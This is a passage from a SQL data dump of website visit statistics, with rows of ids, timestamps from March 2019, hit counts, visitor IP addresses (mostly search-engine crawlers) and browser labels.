','other'),(406852,1553914948,1,1,0,0,'54.36.149.78','other'),(406853,1553915008,1,1,0,0,'54.36.149.34','other'),(406854,1553915512,1,1,0,0,'54.36.148.123','other'),(406855,1553915602,1,1,0,0,'46.229.168.150','other'),(406856,1553915808,1,1,0,0,'54.36.148.190','other'),(406857,1553915845,1,1,0,0,'54.36.149.90','other'),(406858,1553915968,1,1,0,0,'46.229.168.132','other'),(406859,1553916078,1,1,0,0,'54.36.148.121','other'),(406860,1553916147,1,1,0,0,'54.36.150.166','other'),(406861,1553916189,1,1,0,0,'66.249.64.31','chrome'),(406862,1553916324,1,1,0,0,'66.249.64.29','chrome'),(406863,1553916704,1,1,0,0,'66.249.64.30','chrome'),(406864,1553916883,1,1,0,0,'54.36.150.12','other'),(406865,1553917058,1,1,0,0,'54.36.148.135','other'),(406866,1553917228,2,2,0,0,'5.45.207.79','other'),(406867,1553917250,1,1,0,0,'54.36.148.75','other'),(406868,1553917294,4,4,0,0,'178.154.244.11','other'),(406869,1553917710,1,1,0,0,'95.108.213.4','other'),(406870,1553917774,1,1,0,0,'141.8.142.103','other'),(406871,1553917918,1,1,0,0,'54.36.148.251','other'),(406872,1553918058,1,1,0,0,'66.249.64.58','chrome'),(406873,1553918071,2,2,0,0,'40.77.167.10','other'),(406874,1553918086,1,1,0,0,'54.36.148.79','other'),(406875,1553918096,1,1,0,0,'54.36.148.224','other'),(406876,1553918132,1,1,0,0,'54.36.149.1','other'),(406877,1553918233,1,1,0,0,'40.77.167.65','other'),(406878,1553918246,1,1,0,0,'54.36.150.116','other'),(406879,1553918615,1,1,0,0,'66.249.64.30','chrome'),(406880,1553918783,1,1,0,0,'54.36.148.173','other'),(406881,1553918888,1,1,0,0,'8.29.198.25','other'),(406882,1553918945,1,1,0,0,'8.29.198.27','other'),(406883,1553919103,1,1,0,0,'54.36.150.36','other'),(406884,1553919440,1,1,0,0,'46.229.168.147','other'),(406885,1553919530,1,1,0,0,'54.36.150.89','other'),(406886,1553919577,1,1,0,0,'54.36.150.150','other'),(406887,1553920183,2,2,0,0,'66.249.64.30','chrome'),(406888,1553920330,1,1,0,0,'66.249.64.29','chrome'),(406889,1553920354,1,1,0,0,'66.249.64.58','chrome'),(406890,1553920446,1,1,0,0,'54.36.150.152','other'),(406891,1553920451,1,1,0,0,'46.229.168.135','other'),(406892,1553920582,1,1,0,0,'54.36.150.150','other'),(406893,1553920806,1,1,0,0,'54.36.149.103','other'),(406894,1553921000,1,1,0,0,'54.36.148.94','other'),(406895,1553921357,1,1,0,0,'46.229.168.136','other'),(406896,1553921374,1,1,0,0,'54.36.149.105','other'),(406897,1553921399,1,1,0,0,'178.176.113.225','chrome'),(406898,1553921407,1,1,0,0,'40.77.167.10','other'),(406899,1553921424,1,1,0,0,'5.45.207.19','other'),(406900,1553921790,1,1,0,0,'66.249.64.60','chrome'),(406901,1553922034,1,1,0,0,'54.36.148.100','other'),(406902,1553922471,1,1,0,0,'54.36.148.227','other'),(406903,1553922584,1,1,0,0,'207.46.13.145','other'),(406904,1553922660,1,1,0,0,'54.36.150.75','other'),(406905,1553922667,1,1,0,0,'40.77.167.10','other'),(406906,1553922767,1,1,0,0,'66.249.64.30','chrome'),(406907,1553923000,1,1,0,0,'66.249.64.31','chrome'),(406908,1553923036,1,1,0,0,'54.36.148.184','other'),(406909,1553923073,1,1,0,0,'91.196.178.69','chrome'),(406910,1553923393,1,1,0,0,'54.36.148.245','other'),(406911,1553923401,1,1,0,0,'54.36.148.221','other'),(406912,1553923683,1,1,0,0,'54.36.149.13','other'),(406913,1553923995,1,1,0,0,'5.45.207.19','other'),(406914,1553924069,1,1,0,0,'5.45.207.79','other'),(406915,1553924290,1,1,0,0,'178.154.244.11','other'),(406916,1553924377,1,1,0,0,'54.36.148.95','other'),(406917,1553924409,1,1,0,0,'54.36.148.205','other'),(406918,1553924559,1,1,0,0,'46.229.168.129','other'),(406919,1553924618,1,1,0,0,'54.36.148.195','other'),(406920,1553924625,1,1,0,0,'46.229.168.153','other'),(406921,1553924692,1,1,0,0,'54.36.148.0','other'),(406922,1553924886,1,1,0,0,'66.249.64.29','chrome'),(406923,1553925317,1,1,0,0,'54.36.149.87','other'),(406924,1553925400,1,1,0,0,'54.36.148.27','other'),(406925,1553925411,1,1,0,0,'54.36.150.108','other'),(406926,1553925514,1,1,0,0,'54.36.149.88','other'),(406927,1553925605,1,1,0,0,'178.154.244.11','other'),(406928,1553925665,1,1,0,0,'54.36.149.77','other'),(406929,1553925949,1,1,0,0,'54.36.148.18','other'),(406930,1553926043,1,1,0,0,'54.36.149.55','other'),(406931,1553926344,1,1,0,0,'66.249.64.31','chrome'),(406932,1553926606,1,1,0,0,'54.36.148.208','other'),(406933,1553926614,1,1,0,0,'46.229.168.132','other'),(406934,1553926687,1,1,0,0,'66.249.64.60','chrome'),(406935,1553926870,1,1,0,0,'54.36.148.166','other'),(406936,1553927221,1,1,0,0,'54.36.150.54','other'),(406937,1553927633,1,1,0,0,'145.239.91.37','other'),(406938,1553927933,1,1,0,0,'207.46.13.145','other'),(406939,1553928217,1,1,0,0,'54.36.149.84','other'),(406940,1553928274,1,1,0,0,'66.249.64.62','chrome'),(406941,1553928304,1,1,0,0,'54.36.150.181','other'),(406942,1553928340,1,1,0,0,'54.36.149.2','other'),(406943,1553928349,1,1,0,0,'54.36.148.194','other'),(406944,1553928377,1,1,0,0,'54.36.150.167','other'),(406945,1553928525,1,1,0,0,'54.36.148.91','other'),(406946,1553928818,1,1,0,0,'54.36.148.233','other'),(406947,1553929102,1,1,0,0,'54.36.150.190','other'),(406948,1553929401,1,1,0,0,'66.249.64.31','chrome'),(406949,1553929568,1,1,0,0,'46.229.168.141','other'),(406950,1553929658,1,1,0,0,'66.249.64.30','chrome'),(406951,1553929691,1,1,0,0,'46.229.168.163','other'),(406952,1553929720,1,1,0,0,'66.249.64.62','chrome'),(406953,1553929724,1,1,0,0,'8.29.198.25','other'),(406954,1553929800,1,1,0,0,'8.29.198.26','other'),(406955,1553930013,1,1,0,0,'54.36.148.80','other'),(406956,1553930128,1,1,0,0,'54.36.150.163','other'),(406957,1553930161,1,1,0,0,'54.36.149.88','other'),(406958,1553930264,2,2,0,0,'207.46.13.165','other'),(406959,1553930437,1,1,0,0,'66.249.64.31','chrome'),(406960,1553930505,1,1,0,0,'46.211.110.87','chrome'),(406961,1553930691,1,1,0,0,'54.36.148.70','other'),(406962,1553930805,2,2,0,0,'46.229.168.163','other'),(406963,1553930891,1,1,0,0,'54.36.150.20','other'),(406964,1553930935,1,1,0,0,'54.36.150.88','other'),(406965,1553930939,1,1,0,0,'66.249.64.30','chrome'),(406966,1553930944,1,1,0,0,'66.249.64.29','chrome'),(406967,1553931063,1,1,0,0,'178.154.244.11','other'),(406968,1553931116,2,2,0,0,'5.45.207.79','other'),(406969,1553931134,1,1,0,0,'54.36.149.93','other'),(406970,1553931169,1,1,0,0,'46.229.168.139','other'),(406971,1553931233,1,1,0,0,'95.108.213.4','other'),(406972,1553931398,1,1,0,0,'5.45.207.19','other'),(406973,1553931533,1,1,0,0,'54.36.150.33','other'),(406974,1553931588,1,1,0,0,'54.36.149.23','other'),(406975,1553931822,1,1,0,0,'54.36.148.87','other'),(406976,1553932085,1,1,0,0,'157.55.39.226','other'),(406977,1553932171,1,1,0,0,'54.36.148.173','other'),(406978,1553932300,1,1,0,0,'66.249.64.31','chrome'),(406979,1553932363,1,1,0,0,'54.36.148.255','other'),(406980,1553933248,1,1,0,0,'157.55.39.226','other'),(406981,1553933422,1,1,0,0,'46.229.168.140','other'),(406982,1553933636,1,1,0,0,'54.36.149.69','other'),(406983,1553933687,1,1,0,0,'46.229.168.144','other'),(406984,1553933893,1,1,0,0,'52.53.201.78','chrome'),(406985,1553933959,1,1,0,0,'207.46.13.165','other'),(406986,1553933984,1,1,0,0,'54.36.149.105','other'),(406987,1553934117,1,1,0,0,'54.36.148.123','other'),(406988,1553934127,1,1,0,0,'66.249.64.31','chrome'),(406989,1553934458,1,1,0,0,'54.36.150.85','other'),(406990,1553934521,1,1,0,0,'46.229.168.148','other'),(406991,1553934549,1,1,0,0,'66.249.64.29','chrome'),(406992,1553934713,1,1,0,0,'157.55.39.226','other'),(406993,1553934981,2,2,0,0,'95.132.53.147','chrome'),(406994,1553935302,1,1,0,0,'46.229.168.135','other'),(406995,1553935371,1,1,0,0,'66.249.64.60','chrome'),(406996,1553935557,1,1,0,0,'46.229.168.143','other'),(406997,1553935653,2,2,0,0,'66.249.64.30','chrome'),(406998,1553935976,1,1,0,0,'157.55.39.226','other'),(406999,1553936513,1,1,0,0,'54.36.150.9','other'),(407000,1553936629,1,1,0,0,'54.36.148.30','other'),(407001,1553936633,1,1,0,0,'54.36.148.247','other'),(407002,1553936635,1,1,0,0,'46.229.168.152','other'),(407003,1553936918,1,1,0,0,'54.36.148.0','other'),(407004,1553937279,1,1,0,0,'54.36.148.74','other'),(407005,1553937317,1,1,0,0,'46.229.168.134','other'),(407006,1553937320,1,1,0,0,'46.229.168.129','other'),(407007,1553937347,1,1,0,0,'54.36.150.61','other'),(407008,1553937355,1,1,0,0,'54.36.148.154','other'),(407009,1553937912,1,1,0,0,'54.36.150.107','other'),(407010,1553938090,1,1,0,0,'66.249.64.29','chrome'),(407011,1553938163,1,1,0,0,'66.249.64.30','chrome'),(407012,1553938186,1,1,0,0,'54.36.148.37','other'),(407013,1553938243,1,1,0,0,'66.249.64.62','chrome'),(407014,1553938340,1,1,0,0,'54.36.148.16','other'),(407015,1553938852,1,1,0,0,'180.76.15.153','other'),(407016,1553938949,1,1,0,0,'54.36.150.110','other'),(407017,1553939199,1,1,0,0,'46.229.168.133','other'),(407018,1553939213,1,1,0,0,'54.36.150.115','other'),(407019,1553939761,1,1,0,0,'54.36.148.108','other'),(407020,1553939763,1,1,0,0,'46.229.168.138','other'),(407022,1553939872,1,1,0,0,'54.36.150.49','other'),(407023,1553940400,1,1,0,0,'40.77.167.147','other'),(407024,1553940522,1,1,0,0,'66.249.64.30','chrome'),(407025,1553940567,1,1,0,0,'8.29.198.26','other'),(407026,1553940662,1,1,0,0,'8.29.198.25','other'),(407027,1553940689,1,1,0,0,'46.229.168.144','other'),(407028,1553940825,1,1,0,0,'54.36.150.67','other'),(407029,1553941188,1,1,0,0,'66.249.64.31','chrome'),(407030,1553941470,1,1,0,0,'54.36.149.79','other'),(407031,1553941972,1,1,0,0,'54.36.150.182','other'),(407032,1553941996,1,1,0,0,'54.36.150.123','other'),(407033,1553942382,1,1,0,0,'13.66.139.0','other'),(407034,1553942540,1,1,0,0,'52.205.84.186','other'),(407035,1553942574,1,1,0,0,'54.36.149.70','other'),(407036,1553942627,1,1,0,0,'54.36.148.199','other'),(407037,1553942673,1,1,0,0,'46.229.168.129','other'),(407038,1553942908,1,1,0,0,'54.36.148.34','other'),(407039,1553942917,1,1,0,0,'66.249.64.30','chrome'),(407040,1553943146,1,1,0,0,'157.55.39.71','other'),(407041,1553943333,1,1,0,0,'66.249.64.31','chrome'),(407042,1553943335,1,1,0,0,'66.249.64.29','chrome'),(407043,1553943427,1,1,0,0,'54.36.150.49','other'),(407044,1553943935,1,1,0,0,'54.36.148.188','other'),(407045,1553944476,1,1,0,0,'54.36.148.224','other'),(407046,1553944676,1,1,0,0,'66.249.64.31','chrome'),(407047,1553944784,1,1,0,0,'54.36.148.145','other'),(407048,1553944867,1,1,0,0,'54.36.150.4','other'),(407049,1553944870,1,1,0,0,'54.36.150.155','other'),(407050,1553944883,1,1,0,0,'54.36.148.210','other'),(407051,1553945581,1,1,0,0,'54.36.148.253','other'),(407052,1553945666,1,1,0,0,'54.36.148.197','other'),(407053,1553946335,1,1,0,0,'66.249.64.30','chrome'),(407054,1553946530,1,1,0,0,'95.108.213.4','other'),(407055,1553946533,1,1,0,0,'157.55.39.71','other'),(407056,1553946676,1,1,0,0,'178.154.171.27','other'),(407057,1553946683,1,1,0,0,'66.249.64.31','chrome'),(407058,1553947014,1,1,0,0,'157.55.39.72','other'),(407059,1553947217,1,1,0,0,'66.249.64.60','chrome'),(407060,1553947236,1,1,0,0,'178.154.244.11','other'),(407061,1553947999,1,1,0,0,'40.77.167.45','other'),(407062,1553948073,1,1,0,0,'157.55.39.236','other'),(407063,1553948145,2,2,0,0,'5.45.207.79','other'),(407064,1553948461,1,1,0,0,'46.229.168.136','other'),(407065,1553948702,1,1,0,0,'157.55.39.71','other'),(407066,1553948714,1,1,0,0,'195.10.210.70','chrome'),(407067,1553948729,1,1,0,0,'46.229.168.148','other'),(407068,1553949520,1,1,0,0,'66.249.64.30','chrome'),(407069,1553950075,1,1,0,0,'46.229.168.148','other'),(407070,1553950646,1,1,0,0,'66.249.64.31','chrome'),(407071,1553950806,1,1,0,0,'66.249.64.29','chrome'),(407072,1553950970,1,1,0,0,'46.229.168.130','other'),(407073,1553951044,1,1,0,0,'40.77.167.45','other'),(407074,1553951303,1,1,0,0,'66.249.64.58','chrome'),(407075,1553951321,1,1,0,0,'178.154.244.11','other'),(407076,1553951410,2,2,0,0,'8.29.198.25','other'),(407077,1553951991,1,1,0,0,'54.36.150.88','other'),(407078,1553952180,1,1,0,0,'46.229.168.141','other'),(407079,1553952244,1,1,0,0,'40.77.167.45','other'),(407080,1553952564,1,1,0,0,'66.249.64.29','chrome'),(407081,1553952745,1,1,0,0,'54.36.148.173','other'),(407082,1553952807,1,1,0,0,'66.249.64.30','chrome'),(407083,1553952980,1,1,0,0,'66.249.64.31','chrome'),(407084,1553953115,1,1,0,0,'54.36.148.189','other'),(407085,1553953180,1,1,0,0,'54.36.148.20','other'),(407086,1553953416,1,1,0,0,'54.36.148.102','other'),(407087,1553953620,2,2,0,0,'157.55.39.236','other'),(407088,1553953914,1,1,0,0,'54.36.149.81','other'),(407089,1553954266,1,1,0,0,'46.229.168.132','other'),(407090,1553954612,1,1,0,0,'46.229.168.137','other'),(407091,1553955399,1,1,0,0,'54.36.150.133','other'),(407092,1553955709,1,1,0,0,'54.36.148.178','other'),(407093,1553955805,1,1,0,0,'54.36.150.159','other'),(407094,1553955887,1,1,0,0,'54.36.150.63','other'),(407095,1553955958,1,1,0,0,'54.36.148.18','other'),(407096,1553956063,1,1,0,0,'54.36.150.0','other'),(407097,1553956085,1,1,0,0,'54.36.148.111','other'),(407098,1553956164,1,1,0,0,'54.36.148.216','other'),(407099,1553956266,1,1,0,0,'54.36.148.68','other'),(407100,1553956291,1,1,0,0,'46.229.168.136','other'),(407101,1553956555,1,1,0,0,'54.36.150.67','other'),(407102,1553956691,1,1,0,0,'66.249.64.30','chrome'),(407103,1553957210,1,1,0,0,'54.36.149.82','other'),(407104,1553957229,1,1,0,0,'178.154.244.11','other'),(407105,1553957260,1,1,0,0,'5.45.207.19','other'),(407106,1553957528,2,2,0,0,'141.8.142.103','other'),(407107,1553958426,1,1,0,0,'54.36.148.209','other'),(407108,1553958461,1,1,0,0,'66.249.64.29','chrome'),(407109,1553958475,1,1,0,0,'141.8.142.103','other'),(407110,1553958557,1,1,0,0,'54.36.150.47','other'),(407111,1553958643,1,1,0,0,'54.36.150.60','other'),(407112,1553958866,1,1,0,0,'54.36.148.84','other'),(407113,1553959323,1,1,0,0,'54.36.149.22','other'),(407114,1553959338,2,0,2,0,'51.68.152.26',''),(407115,1553959483,1,1,0,0,'66.249.64.29','chrome'),(407116,1553959681,1,1,0,0,'54.36.148.15','other'),(407117,1553959846,1,1,0,0,'54.36.148.25','other'),(407118,1553960073,2,2,0,0,'46.229.168.129','other'),(407119,1553960817,1,1,0,0,'66.249.64.58','chrome'),(407120,1553960982,1,1,0,0,'157.55.39.95','other'),(407121,1553961102,1,1,0,0,'54.36.150.98','other'),(407122,1553961261,1,1,0,0,'157.55.39.71','other'),(407123,1553961301,1,1,0,0,'66.249.64.31','chrome'),(407124,1553961348,1,1,0,0,'95.67.121.106','chrome'),(407125,1553961525,1,0,1,0,'66.249.64.30',''),(407126,1553961576,1,1,0,0,'54.36.149.43','other'),(407127,1553961734,1,1,0,0,'54.36.148.125','other'),(407128,1553961891,1,1,0,0,'194.187.110.38','chrome'),(407129,1553962257,2,2,0,0,'8.29.198.26','other'),(407130,1553962289,1,1,0,0,'54.36.148.249','other'),(407131,1553962532,1,1,0,0,'66.249.64.31','chrome'),(407132,1553962603,1,1,0,0,'54.36.148.234','other'),(407133,1553962754,1,1,0,0,'54.36.150.83','other'),(407134,1553963072,1,1,0,0,'95.24.201.60','msie'),(407135,1553963166,1,1,0,0,'54.36.150.12','other'),(407136,1553963259,1,1,0,0,'46.229.168.136','other'),(407137,1553963782,1,1,0,0,'66.249.64.30','chrome'),(407138,1553964029,1,1,0,0,'54.36.150.92','other'),(407139,1553964078,1,1,0,0,'54.36.149.2','other'),(407140,1553964238,1,1,0,0,'54.36.148.195','other'),(407141,1553964387,1,1,0,0,'46.229.168.147','other'),(407142,1553965074,1,1,0,0,'5.45.207.8','other'),(407143,1553965076,1,1,0,0,'95.108.181.75','other'),(407144,1553965139,1,1,0,0,'54.36.150.60','other'),(407145,1553965329,1,1,0,0,'54.36.150.130','other'),(407146,1553965526,1,1,0,0,'40.77.167.45','other'),(407147,1553966313,1,1,0,0,'54.36.148.25','other'),(407148,1553966323,1,1,0,0,'54.36.148.17','other'),(407149,1553966646,1,1,0,0,'46.229.168.140','other'),(407150,1553967103,1,1,0,0,'54.36.149.23','other'),(407151,1553967178,1,1,0,0,'54.36.148.119','other'),(407152,1553967436,1,1,0,0,'66.249.64.30','chrome'),(407153,1553967491,1,1,0,0,'66.249.64.31','chrome'),(407154,1553968008,1,1,0,0,'54.36.150.176','other'),(407155,1553968095,1,1,0,0,'54.36.148.48','other'),(407156,1553968304,1,1,0,0,'46.229.168.144','other'),(407157,1553968499,1,1,0,0,'157.55.39.71','other'),(407158,1553968545,1,1,0,0,'46.229.168.146','other'),(407159,1553968624,1,1,0,0,'54.36.148.40','other'),(407160,1553968665,1,1,0,0,'54.36.148.12','other'),(407161,1553968891,1,1,0,0,'54.36.150.121','other'),(407162,1553969182,1,1,0,0,'66.249.64.58','chrome'),(407163,1553969259,1,1,0,0,'40.77.167.35','other'),(407164,1553969358,1,1,0,0,'54.36.149.63','other'),(407165,1553969782,1,1,0,0,'66.249.64.29','chrome'),(407166,1553970031,1,1,0,0,'46.229.168.137','other'),(407167,1553970818,1,1,0,0,'66.249.64.30','chrome'),(407168,1553970902,2,2,0,0,'46.229.168.138','other'),(407169,1553970994,1,1,0,0,'185.163.111.235','firefox'),(407170,1553971026,1,1,0,0,'66.249.64.62','chrome'),(407171,1553971170,1,1,0,0,'54.36.150.91','other'),(407172,1553971250,1,1,0,0,'54.36.150.145','other'),(407173,1553971426,1,1,0,0,'46.229.168.145','other'),(407174,1553971572,1,1,0,0,'54.36.150.48','other'),(407175,1553971587,1,1,0,0,'157.55.39.236','other'),(407176,1553971603,1,1,0,0,'54.36.150.126','other'),(407177,1553971814,1,1,0,0,'66.249.64.60','chrome'),(407178,1553971842,1,1,0,0,'46.229.168.151','other'),(407179,1553971845,1,1,0,0,'54.36.148.187','other'),(407180,1553971938,1,1,0,0,'54.36.150.54','other'),(407181,1553972000,1,1,0,0,'46.229.168.154','other'),(407182,1553972222,1,1,0,0,'54.36.148.99','other'),(407183,1553972456,1,1,0,0,'66.249.64.31','chrome'),(407184,1553972715,1,1,0,0,'54.36.148.9','other'),(407185,1553972734,1,1,0,0,'54.36.149.26','other'),(407186,1553972911,1,1,0,0,'54.36.148.155','other'),(407187,1553973095,2,2,0,0,'8.29.198.26','other'),(407188,1553973463,1,1,0,0,'54.36.149.27','other'),(407189,1553973469,1,1,0,0,'54.36.148.166','other'),(407190,1553973578,1,1,0,0,'54.36.148.191','other'),(407191,1553973650,1,1,0,0,'157.55.39.71','other'),(407192,1553973826,1,1,0,0,'54.36.150.93','other'),(407193,1553973986,1,1,0,0,'54.36.150.73','other'),(407194,1553974623,1,1,0,0,'40.77.167.35','other'),(407195,1553974903,1,1,0,0,'157.55.39.74','other'),(407196,1553975062,1,1,0,0,'54.36.148.251','other'),(407197,1553975108,1,1,0,0,'54.36.150.99','other'),(407198,1553975236,1,1,0,0,'54.36.148.64','other'),(407199,1553975767,1,1,0,0,'66.249.64.31','chrome'),(407200,1553975823,1,1,0,0,'54.36.149.18','other'),(407201,1553975867,1,1,0,0,'46.229.168.139','other'),(407202,1553975958,1,1,0,0,'46.229.168.135','other'),(407203,1553976089,1,1,0,0,'54.36.148.58','other'),(407204,1553976244,2,2,0,0,'5.45.207.19','other'),(407205,1553976299,1,1,0,0,'54.36.150.56','other'),(407206,1553976624,1,1,0,0,'54.36.150.142','other'),(407207,1553976626,1,1,0,0,'157.55.39.71','other'),(407208,1553976655,1,1,0,0,'54.36.148.208','other'),(407209,1553976719,1,1,0,0,'54.36.150.168','other'),(407210,1553976967,1,1,0,0,'87.250.224.47','other'),(407211,1553977111,1,1,0,0,'66.249.64.31','chrome'),(407212,1553977164,1,1,0,0,'66.249.64.29','chrome'),(407213,1553977690,1,1,0,0,'54.36.148.198','other'),(407214,1553977752,1,1,0,0,'66.249.64.30','chrome'),(407215,1553977788,1,1,0,0,'141.8.142.103','other'),(407216,1553978158,2,2,0,0,'5.45.207.19','other'),(407217,1553978213,2,2,0,0,'66.249.64.29','chrome'),(407218,1553978616,1,1,0,0,'40.77.167.35','other'),(407219,1553978628,1,1,0,0,'46.229.168.152','other'),(407220,1553978752,1,1,0,0,'54.36.150.68','other'),(407221,1553978777,2,2,0,0,'207.46.13.62','other'),(407222,1553978851,1,1,0,0,'66.249.64.58','chrome'),(407223,1553978902,1,1,0,0,'54.36.149.71','other'),(407224,1553978950,1,1,0,0,'66.249.64.30','chrome'),(407225,1553979079,1,1,0,0,'54.36.148.139','other'),(407226,1553979168,1,1,0,0,'157.55.39.71','other'),(407227,1553979459,1,1,0,0,'66.249.64.31','chrome'),(407228,1553979825,1,1,0,0,'37.204.188.209','chrome'),(407229,1553980081,1,1,0,0,'66.249.64.58','chrome'),(407230,1553980240,1,1,0,0,'54.36.150.177','other'),(407231,1553980383,1,1,0,0,'54.36.149.57','other'),(407232,1553980728,1,1,0,0,'66.249.64.31','chrome'),(407233,1553980879,1,1,0,0,'178.154.244.11','other'),(407234,1553981293,1,1,0,0,'54.36.148.214','other'),(407235,1553981321,1,1,0,0,'54.36.150.133','other'),(407236,1553981389,1,1,0,0,'5.45.207.79','other'),(407237,1553981392,1,1,0,0,'54.36.148.171','other'),(407238,1553981549,1,1,0,0,'54.36.149.72','other'),(407239,1553981716,1,1,0,0,'157.55.39.71','other'),(407240,1553981732,1,1,0,0,'66.249.64.60','chrome'),(407241,1553981910,1,1,0,0,'54.36.149.32','other'),(407242,1553981912,1,1,0,0,'54.36.149.26','other'),(407243,1553981927,1,1,0,0,'66.249.64.31','chrome'),(407244,1553981947,2,2,0,0,'66.249.64.30','chrome'),(407245,1553981953,1,1,0,0,'54.36.149.74','other'),(407246,1553982283,1,1,0,0,'46.229.168.134','other'),(407247,1553982750,1,1,0,0,'54.36.150.7','other'),(407248,1553983076,1,1,0,0,'54.36.148.163','other'),(407249,1553983445,1,1,0,0,'54.36.150.52','other'),(407250,1553983507,1,1,0,0,'54.36.148.159','other'),(407251,1553983567,2,2,0,0,'66.249.64.30','chrome'),(407252,1553983781,1,1,0,0,'66.249.64.60','chrome'),(407253,1553983935,2,2,0,0,'8.29.198.25','other'),(407254,1553984220,1,1,0,0,'54.36.149.26','other'),(407255,1553984391,1,1,0,0,'157.55.39.184','other'),(407256,1553984497,1,1,0,0,'54.36.149.15','other'),(407257,1553984573,2,2,0,0,'66.249.64.31','chrome'),(407258,1553984814,1,1,0,0,'46.229.168.145','other'),(407259,1553985493,2,2,0,0,'66.249.64.62','chrome'),(407260,1553985583,1,1,0,0,'54.36.148.145','other'),(407261,1553985603,1,1,0,0,'157.55.39.71','other'),(407262,1553985796,1,1,0,0,'54.36.149.62','other'),(407263,1553985889,1,1,0,0,'46.229.168.137','other'),(407264,1553986418,1,1,0,0,'66.249.64.60','chrome'),(407265,1553986695,1,1,0,0,'87.250.224.65','other'),(407266,1553986709,1,1,0,0,'54.36.148.219','other'),(407267,1553986803,1,1,0,0,'157.55.39.184','other'),(407268,1553986902,3,3,0,0,'5.45.207.19','other'),(407269,1553986990,1,1,0,0,'54.36.149.67','other'),(407270,1553987255,1,1,0,0,'54.36.150.35','other'),(407271,1553987284,1,1,0,0,'66.249.64.30','chrome'),(407272,1553987337,1,1,0,0,'54.36.149.80','other'),(407273,1553987416,2,2,0,0,'66.249.64.31','chrome'),(407274,1553987493,1,1,0,0,'54.36.148.7','other'),(407275,1553987529,1,1,0,0,'54.36.150.84','other'),(407276,1553987551,2,2,0,0,'66.249.64.58','chrome'),(407277,1553987554,1,1,0,0,'54.36.148.127','other'),(407278,1553987580,1,1,0,0,'54.36.150.97','other'),(407279,1553987608,1,1,0,0,'178.154.244.11','other'),(407280,1553987769,1,1,0,0,'46.229.168.134','other'),(407281,1553987818,1,1,0,0,'46.229.168.144','other'),(407282,1553987847,1,1,0,0,'216.244.66.241','other'),(407283,1553988376,1,1,0,0,'54.36.150.86','other'),(407284,1553988657,1,1,0,0,'54.36.149.19','other'),(407285,1553988721,2,2,0,0,'66.249.64.58','chrome'),(407286,1553988991,1,1,0,0,'66.249.64.62','chrome'),(407287,1553989551,1,1,0,0,'54.36.150.33','other'),(407288,1553989609,1,1,0,0,'66.249.64.31','chrome'),(407289,1553989707,1,1,0,0,'54.36.149.107','other'),(407290,1553989792,1,1,0,0,'157.55.39.71','other'),(407291,1553989826,1,1,0,0,'54.36.148.50','other'),(407292,1553989828,1,1,0,0,'66.249.64.58','chrome'),(407293,1553990180,1,1,0,0,'193.106.30.98','firefox'),(407294,1553990294,1,1,0,0,'5.45.207.19','other'),(407295,1553990468,1,1,0,0,'54.36.149.31','other'),(407296,1553990521,1,1,0,0,'54.36.148.255','other'),(407297,1553990577,2,2,0,0,'66.249.64.29','chrome'),(407298,1553990761,2,2,0,0,'66.249.64.30','chrome'),(407299,1553990796,1,1,0,0,'54.36.149.107','other'),(407300,1553990927,1,1,0,0,'54.36.149.16','other'),(407301,1553990928,1,1,0,0,'46.229.168.135','other'),(407302,1553991265,2,2,0,0,'54.36.148.178','other'),(407303,1553991588,1,1,0,0,'157.55.39.184','other'),(407304,1553991604,1,1,0,0,'54.36.148.235','other'),(407305,1553991637,1,1,0,0,'157.55.39.182','other'),(407306,1553991841,1,1,0,0,'54.36.148.183','other'),(407307,1553991871,1,1,0,0,'66.249.64.60','chrome'),(407308,1553992095,1,1,0,0,'54.36.149.76','other'),(407309,1553992218,1,1,0,0,'54.36.149.71','other'),(407310,1553992498,1,1,0,0,'46.229.168.132','other'),(407311,1553992741,1,1,0,0,'54.36.150.125','other'),(407312,1553992847,1,1,0,0,'66.249.64.31','chrome'),(407313,1553993026,1,1,0,0,'54.36.148.157','other'),(407314,1553993176,1,1,0,0,'54.36.148.189','other'),(407315,1553993512,3,3,0,0,'66.249.64.62','chrome'),(407316,1553993632,1,1,0,0,'46.229.168.133','other'),(407317,1553993696,1,1,0,0,'46.229.168.161','other'),(407318,1553993744,1,1,0,0,'109.74.154.72','chrome'),(407319,1553993866,1,1,0,0,'54.36.148.127','other'),(407320,1553993996,1,1,0,0,'46.229.168.139','other'),(407321,1553994083,1,1,0,0,'54.36.148.123','other'),(407322,1553994192,1,1,0,0,'54.36.150.137','other'),(407323,1553994391,1,1,0,0,'66.249.64.31','chrome'),(407324,1553994444,1,1,0,0,'87.250.224.47','other'),(407325,1553994515,1,1,0,0,'178.154.244.11','other'),(407326,1553994563,1,1,0,0,'5.45.207.19','other'),(407327,1553994765,1,1,0,0,'8.29.198.26','other'),(407328,1553994781,1,1,0,0,'37.9.113.20','other'),(407329,1553994945,1,1,0,0,'8.29.198.25','other'),(407330,1553994948,1,1,0,0,'54.36.150.15','other'),(407331,1553995178,1,1,0,0,'54.36.148.224','other'),(407332,1553995191,1,1,0,0,'40.77.167.175','other'),(407333,1553995390,1,1,0,0,'54.36.150.185','other'),(407334,1553995456,2,2,0,0,'66.249.64.30','chrome'),(407335,1553995466,1,1,0,0,'54.36.150.31','other'),(407336,1553995617,2,2,0,0,'66.249.64.29','chrome'),(407337,1553995807,1,1,0,0,'40.77.167.43','other'),(407338,1553996083,1,1,0,0,'46.229.168.147','other'),(407339,1553996242,1,1,0,0,'46.229.168.133','other'),(407340,1553996424,1,1,0,0,'54.36.148.241','other'),(407341,1553996497,1,1,0,0,'54.36.150.84','other'),(407342,1553996660,1,1,0,0,'54.36.149.20','other'),(407343,1553996759,1,1,0,0,'54.36.150.181','other'),(407344,1553997038,1,1,0,0,'54.36.150.102','other'),(407345,1553997115,2,2,0,0,'66.249.64.31','chrome'),(407346,1553997210,2,2,0,0,'66.249.64.30','chrome'),(407347,1553997288,1,1,0,0,'54.36.148.184','other'),(407348,1553997710,1,1,0,0,'46.229.168.129','other'),(407349,1553997819,2,2,0,0,'40.77.167.175','other'),(407350,1553997916,1,1,0,0,'54.36.148.119','other'),(407351,1553998029,1,1,0,0,'66.249.64.29','chrome'),(407352,1553998088,1,1,0,0,'46.229.168.154','other'),(407353,1553998254,1,1,0,0,'54.36.148.239','other'),(407354,1553999318,1,1,0,0,'66.249.64.29','chrome'),(407355,1553999412,1,1,0,0,'54.36.148.172','other'),(407356,1553999749,1,1,0,0,'66.249.64.31','chrome'),(407357,1554000142,1,1,0,0,'66.249.64.30','chrome'),(407358,1554000194,1,1,0,0,'54.36.150.98','other'),(407359,1554000475,1,1,0,0,'66.249.64.60','chrome'),(407360,1554000504,1,1,0,0,'54.36.150.117','other'),(407361,1554000774,1,1,0,0,'5.45.207.19','other'),(407362,1554000780,1,1